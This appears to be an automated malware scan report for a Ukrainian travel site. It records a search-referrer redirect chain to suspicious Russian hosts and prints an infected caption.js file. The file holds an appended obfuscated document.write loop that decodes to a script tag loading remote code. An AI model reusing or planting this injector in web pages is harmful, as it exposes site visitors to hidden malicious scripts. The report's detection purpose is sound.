Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://anex-tour.com.ua/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: anex-tour.com.ua Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 01:41:46 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: nginx/1.4.7 Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sun, 31 Aug 2014 01:41:46 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: _cutt_caches_images=1409449306; expires=Mon, 01-Sep-2014 01:41:46 GMT; path=/ Set-Cookie: a0a080ab576f21cca9c817ae206f01f0=thibvgf9n7b1n0rfkbsm0rr6c4; path=/ X-Powered-By: PHP/5.3.3 | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Sun, 31 Aug 2014 03:46:22 GMT Pragma: no-cache Location: http://ugagr.ru/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Sun, 31 Aug 2014 03:46:22 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
| Request | Server response | Status |
http://anex-tour.com.ua/ | 200 OK Content-Length: 8810 Content-Type: text/html | clean |
http://anex-tour.com.ua/media/system/js/caption.js | 200 OK Content-Length: 2136 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); <!-- js-tools --> y=0;while(y<62)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00lpngpsu.epn/dpn/vb0dmj0tubu/qiq#?=0tdsjqu?'.charCodeAt(y++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://anex-tour.com.ua//www.travelpayouts.com/widgets/f30648468a3cc309ebb4870816a4b3dc.js?v=102/ | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://anex-tour.com.ua/test404page.js | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=anex-tour.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://anex-tour.com.ua/
Result: anex-tour.com.ua is not infected or malware details are not published yet.
Result: anex-tour.com.ua is not infected or malware details are not published yet.